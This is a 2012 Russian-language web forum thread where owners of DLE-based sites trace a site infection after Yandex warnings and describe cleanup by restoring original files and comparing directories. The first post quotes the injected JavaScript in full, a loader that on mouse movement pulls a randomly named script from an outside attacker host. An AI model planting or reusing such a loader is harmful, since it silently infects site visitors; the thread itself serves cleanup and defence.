RockKenny 5 Опубликовано: 5 апреля 2012 Рассказать Опубликовано: 5 апреля 2012 Всем привет. Сайт fixshop.ru. Сегодня яндекс сообщил, что на сайте вирус, путем долгих ковыряний был найден скрипт (function() { var url = 'http://gmov4d.xvseedhxey.homeftp.net/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function () { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); Каким образом он попадет в код сайта не понимаю. Возможно те кто шарит в движке сразу подскажет где капать: (ссылку открывать в GoogleChrome!!!!) http://fixshop.ru/engine/classes/min/index.php?charset=windows-1251&g=general Листаем до конца, там зашифрованный код! Как он туда попадает? Для сравнение откройте: (ссылку открывать в GoogleChrome!!!!) http://dle-news.ru/engine/classes/min/index.php?charset=windows-1251&g=general Все чисто. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 5 апреля 2012 Рассказать Опубликовано: 5 апреля 2012 В JS скриптах у вас этот код. Как попадает читайте: http://forum.dle-news.ru/index.php?showtopic=59186 Цитата Ссылка на сообщение Поделиться на других сайтах
RockKenny 5 Опубликовано: 5 апреля 2012 Рассказать Опубликовано: 5 апреля 2012 (изменено) Автор Простите, но о каких js идет речь, точно не те, что в папке templates? Как мне их вычислить? Изменено 5 апреля 2012 пользователем RockKenny Цитата Ссылка на сообщение Поделиться на других сайтах
Wanderers 17 Опубликовано: 5 апреля 2012 Рассказать Опубликовано: 5 апреля 2012 Простите, но о каких js идет речь, точно не те, что в папке templates? Как мне их вычислить? В файлах с расширением js В папках /templates/*/js/ тоже смотрите. Цитата Ссылка на сообщение Поделиться на других сайтах
RockKenny 5 Опубликовано: 5 апреля 2012 Рассказать Опубликовано: 5 апреля 2012 Автор в templates все чисто 1 Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 6 апреля 2012 Рассказать Опубликовано: 6 апреля 2012 Простите, но о каких js идет речь, точно не те, что в папке templates? не только в папке templates, а в любых которые в папке engine/ и вложенных в нее папках. Также после восстановления всех оригинальных файлов скрипта, нужно очистить кеш скрипта в админпанели на главной. Цитата Ссылка на сообщение Поделиться на других сайтах
RockKenny 5 Опубликовано: 6 апреля 2012 Рассказать Опубликовано: 6 апреля 2012 Автор спс, я уже подумал, что проще заменить чем чистить Цитата Ссылка на сообщение Поделиться на других сайтах
RockKenny 5 Опубликовано: 6 апреля 2012 Рассказать Опубликовано: 6 апреля 2012 Автор троян был в одном из файлов в папке engine/classes/js Цитата Ссылка на сообщение Поделиться на других сайтах
komnervov 0 Опубликовано: 6 апреля 2012 Рассказать Опубликовано: 6 апреля 2012 Я обнаружил этот троян в 196 js файлах движка, большую часть получилось заменить, но около 40 штук, почему-то в оригинале не оказалось. Метод поиска: зашел по ФТП через командер, прямо на сервере поиском нашел все файлы JS, после чего сделал сравнение папок оригинала движка и папок на сервере, он выдал все файлы с различиями, за исключением 7 штук, все были .js. Далее там есть функция заменить файлы и одной колонки в другой, все что есть в оригинале движка я заменил, остальные выписал и удалил левый текст руками. Сейчас попробую очистить кеш, а то после перепроверки яндекс не снял санции. Цитата Ссылка на сообщение Поделиться на других сайтах
RockKenny 5 Опубликовано: 7 апреля 2012 Рассказать Опубликовано: 7 апреля 2012 Автор жду результатов проверки яндекса Цитата Ссылка на сообщение Поделиться на других сайтах
sergeylost 0 Опубликовано: 7 апреля 2012 Рассказать Опубликовано: 7 апреля 2012 Я обнаружил этот троян в 196 js файлах движка, большую часть получилось заменить, но около 40 штук, почему-то в оригинале не оказалось. Метод поиска: зашел по ФТП через командер, прямо на сервере поиском нашел все файлы JS, после чего сделал сравнение папок оригинала движка и папок на сервере, он выдал все файлы с различиями, за исключением 7 штук, все были .js. Далее там есть функция заменить файлы и одной колонки в другой, все что есть в оригинале движка я заменил, остальные выписал и удалил левый текст руками. Сейчас попробую очистить кеш, а то после перепроверки яндекс не снял санции. Если не трудно то поподробнее, как вы сделали сравнение. Я хоть и пользуюсь командером, но как то не очень подробно разбирался, все больше как менеджером туда сюда лЁтать по компу. Сорри. У меня на сайте spbtur.ru (версия 7.6 пора обновляться ох пора!) тоже какая то лабуда. И главное серверные товарисчи с вальюхост.ру утверждают что у них все ок. Типа я сам дурак. Я перестал с ними переписываться когда понял что отвечает один человек за всех методом копи-пасте. Я из папки uploads удалил более 9000 (!!!!) левых файлов с расширением пхп и звучащие как драйвер к магнитоыфону.пхп или драйвер к стиральной машинке .пхп Я откровенно говоря думал что на этом все и кончится. но не тут то было. Идут какие то волны на сайт, волны запросов вот этих несуществующих файлов. И идут вроде как с сервера. Вообще голова уже не думает. Прочитал ваш текст и подумалось "а вдруг вычислю?"Кстати говоря Яндекс говорит что сайт безопасен. несколько раз пробовал. Результат один и тот же. Но тем не менее идут запросы просто как из пулемета вот к примеру кусок лог еррор файла: - /pub/home/.... /uploads/drayver-na-modem-generik-rocswel.php [sun Apr 8 00:18:16 2012] [error] [client 217.69.134.91] File does not exist: /pub/home/..../uploads/drayver-nr-lazer-jet-1160.php [sun Apr 8 00:18:19 2012] [error] [client 217.69.134.91] File does not exist: /pub/home/..../uploads/drayvera-dlya-bluetooth-tm-304.php В папке аплоадс нет уже никаких этих гадких файлов. Стерты вручную. При этом IP "клиента" судя по записи меняется. Каждые несколько записей. Идет буквально какая то бомбардировка. Что это? Бот? Откуда он гад шпилит? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 8 апреля 2012 Рассказать Опубликовано: 8 апреля 2012 (изменено) удалено Изменено 8 апреля 2012 пользователем WWW.ZEOS.IN Цитата Ссылка на сообщение Поделиться на других сайтах
sergeylost 0 Опубликовано: 8 апреля 2012 Рассказать Опубликовано: 8 апреля 2012 sergeylost, Если ваша тема начинается с вопроса и вам нужна какая либо помощь, то в самой теме в обязательном порядке вы должны указывать ссылку на ваш сайт. Если ваш сайт находится в локальной сети и вы не можете предоставить ссылку, или вы не хотите публиковать открытой ссылки на ваш сайт, то отправляйте персональное сообщение с вопросом в службу поддержки непосредственно с сайта http://dle-news.ru/, вам ответят на ваш вопрос в персональном порядке, в случае если пользуетесь платной версией скрипта и обладаете лицензией на скрипт. Если вы пользуетесь демоверсией, то вам необходимо разместить сайт в сети интернет, и только потом обращаться за помощью. По находящимся на локальных компьютерах демоверсиям никакой помощи и поддержки на форуме не оказывается. Если вы не указали сайт, то ваша тема будет закрыта, а аккаунт на форуме заблокирован. А ЭТО ЧТО? ... цитирую из моего предыдущего поста.. У меня на сайте spbtur.ru Уберите предупреждение! Я НИЧЕГО не нарушил!Спасибо товарищу Зевсу. Замылил мой вопрос. Теперь будут читать про последнее сообщение про "нарушение" а про вопрос НИКТО не вспомнит. Спасибо. Я обнаружил этот троян в 196 js файлах движка, большую часть получилось заменить, но около 40 штук, почему-то в оригинале не оказалось. Метод поиска: зашел по ФТП через командер, прямо на сервере поиском нашел все файлы JS, после чего сделал сравнение папок оригинала движка и папок на сервере, он выдал все файлы с различиями, за исключением 7 штук, все были .js. Далее там есть функция заменить файлы и одной колонки в другой, все что есть в оригинале движка я заменил, остальные выписал и удалил левый текст руками. Сейчас попробую очистить кеш, а то после перепроверки яндекс не снял санции. Если не трудно то поподробнее, как вы сделали сравнение. Я хоть и пользуюсь командером, но как то не очень подробно разбирался, все больше как менеджером туда сюда лЁтать по компу. Сорри. У меня на сайте spbtur.ru (болд фонтом специально для товарища Зевса. Он плохо видит. - У мена версия 7.6 пора обновляться ох пора!) тоже какая то лабуда. И главное серверные товарисчи с вальюхост.ру утверждают что у них все ок. Типа я сам дурак. Я перестал с ними переписываться когда понял что отвечает один человек за всех методом копи-пасте. Я из папки uploads удалил более 9000 (!!!!) левых файлов с расширением пхп и звучащие как драйвер к магнитоыфону.пхп или драйвер к стиральной машинке .пхп Я откровенно говоря думал что на этом все и кончится. но не тут то было. Идут какие то волны на сайт, волны запросов вот этих несуществующих файлов. И идут вроде как с сервера. Вообще голова уже не думает. Прочитал ваш текст и подумалось "а вдруг вычислю?" Кстати говоря Яндекс говорит что сайт безопасен. несколько раз пробовал. Результат один и тот же. Но тем не менее идут запросы просто как из пулемета вот к примеру кусок лог еррор файла: - /pub/home/.... /uploads/drayver-na-modem-generik-rocswel.php [sun Apr 8 00:18:16 2012] [error] [client 217.69.134.91] File does not exist: /pub/home/..../uploads/drayver-nr-lazer-jet-1160.php [sun Apr 8 00:18:19 2012] [error] [client 217.69.134.91] File does not exist: /pub/home/..../uploads/drayvera-dlya-bluetooth-tm-304.php В папке аплоадс нет уже никаких этих гадких файлов. Стерты вручную. При этом IP "клиента" судя по записи меняется. Каждые несколько записей. Идет буквально какая то бомбардировка. Что это? Бот? Откуда он гад шпилит? Цитата Ссылка на сообщение Поделиться на других сайтах
RockKenny 5 Опубликовано: 8 апреля 2012 Рассказать Опубликовано: 8 апреля 2012 Автор Что-то на водит на мысль, что в движке есть дырочка.... Цитата Ссылка на сообщение Поделиться на других сайтах
RockKenny 5 Опубликовано: 9 апреля 2012 Рассказать Опубликовано: 9 апреля 2012 Автор После удаления в прошлого вируса, поменял пароли, проверил комп на вирусы, на всякий, чист. Яндекс говорит, что вирус на сайте. Помогите его обнаружить, на прошлом месте его нет. Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 9 апреля 2012 Рассказать Опубликовано: 9 апреля 2012 RockKenny, Восстанавливать нужно все без исключения оригинальные файлы скрипта на сервере из архива дистрибутива. Модифицировать вам могли любой файл, потому как у вас был украден FTP доступ и изменить с таким доступом могли любой файл. Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 9 апреля 2012 Рассказать Опубликовано: 9 апреля 2012 sergeylost, товарисчь, нервничать и язвить не стоит. если написано указывать сайт - значит надо его указывать до тех пор, пока не перенесут в группу клиенты. никто не собирается бегать по вашим постам и искать был ли там указан сайт или нетуж тем более если рассчитываешь на какую то помощь, надо быть немного добрее и скромнее. Цитата Ссылка на сообщение Поделиться на других сайтах
komnervov 0 Опубликовано: 9 апреля 2012 Рассказать Опубликовано: 9 апреля 2012 sergeylost, Вообщем после второй проверки санкции не снял яндекс, буду искать дальше. У меня стоит DLE 9.2 Что касается командера: - заходим по FTP на свой сайт (мне рекомендовали поставить один из последних командеров, у него появился мастер пароль с нормальным шифрованием), в одном окне открываем папку с нашим сайтом на сервере. - во втором окне открываем папку с чистым инсталом движка - переходим: инструменты>синхронизировать каталоги, нажать, вверху видим пути к папкам. - нажать сравнить и подождать, дальше почитать подписи к кнопкам фильтра, можно спрятать уникальные, спрятать одинаковые, и прочее. - дальше видим уникальные с крестиком и разные с зеленой стрелочкой, можеи оставить только разные и отметив скопировать с одной колонки в другую. (так я собсвенно заменил все .js одинаковые с оригиналом). Я тоже в этом вопросе далеко не профи, мне подсказали в каком направлении искать, и я как смог воспользовался, видимо что-то упустил. Как вычищу, сделаю свои выводы. Цитата Ссылка на сообщение Поделиться на других сайтах
prikindel 255 Опубликовано: 9 апреля 2012 Рассказать Опубликовано: 9 апреля 2012 komnervov, вы главное не забывайте, что дело может быть не только в движке, модулях и жава скриптах. дело может быть еще и в серверном ПО, неправильно назначенных правах, устаревших пакетах типа PMAо вирусах на компе вебмастера я не говорю, ибо это по умолчанию нужно проверять Цитата Ссылка на сообщение Поделиться на других сайтах
komnervov 0 Опубликовано: 9 апреля 2012 Рассказать Опубликовано: 9 апреля 2012 komnervov, вы главное не забывайте, что дело может быть не только в движке, модулях и жава скриптах. дело может быть еще и в серверном ПО, неправильно назначенных правах, устаревших пакетах типа PMA о вирусах на компе вебмастера я не говорю, ибо это по умолчанию нужно проверять Вирусы погонял на компьютере, и каспером и нодом. Парочку подозрительных в темпе нашел. Собственно каспер первый и забил тревогу. Потом среагировал Яндекс. Сейчас попробую продлить лицензию, и обновить до актуального DLE. Если не поможет, даже не знаю тогда. С яндекса две трети трафа, обидно.Фаербагом пересмотрел сценарий загрузки страниц на которые ругается Яндекс, ну нет там ничего подозрительного. Я даже рекламу всю удалил, что грузится скриптами ( Цитата Ссылка на сообщение Поделиться на других сайтах
sergeylost 0 Опубликовано: 9 апреля 2012 Рассказать Опубликовано: 9 апреля 2012 sergeylost, Вообщем после второй проверки санкции не снял яндекс, буду искать дальше. У меня стоит DLE 9.2 Что касается командера: - заходим по FTP на свой сайт (мне рекомендовали поставить один из последних командеров, у него появился мастер пароль с нормальным шифрованием), в одном окне открываем папку с нашим сайтом на сервере. - во втором окне открываем папку с чистым инсталом движка - переходим: инструменты>синхронизировать каталоги, нажать, вверху видим пути к папкам. - нажать сравнить и подождать, дальше почитать подписи к кнопкам фильтра, можно спрятать уникальные, спрятать одинаковые, и прочее. - дальше видим уникальные с крестиком и разные с зеленой стрелочкой, можеи оставить только разные и отметив скопировать с одной колонки в другую. (так я собсвенно заменил все .js одинаковые с оригиналом). Я тоже в этом вопросе далеко не профи, мне подсказали в каком направлении искать, и я как смог воспользовался, видимо что-то упустил. Как вычищу, сделаю свои выводы. Сайт spbtur.ru Спасибо. Вот действительно спасибо. А я как то индеферентно относился к командеровским командам ..гыгыгы .. масло маслянное..считал их уделом знаек-в-командере-ковыряек. И вот теперь: век живи век учись. Попробую. Чем черт не шутит. Глядишь обнаружу козявку. Она мне зараза выходящий трафик на сайте за сутки до 2 Гигов накачивает. Насколько это много я вот не в курсе, но раньше сайт влегкую открывался, сейчас надо сидеть ждать. В общем надо искать. Командами командного командера скомандуем. Бест регардс. Но пасаран. (Уважуха, враг не пройдет) Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.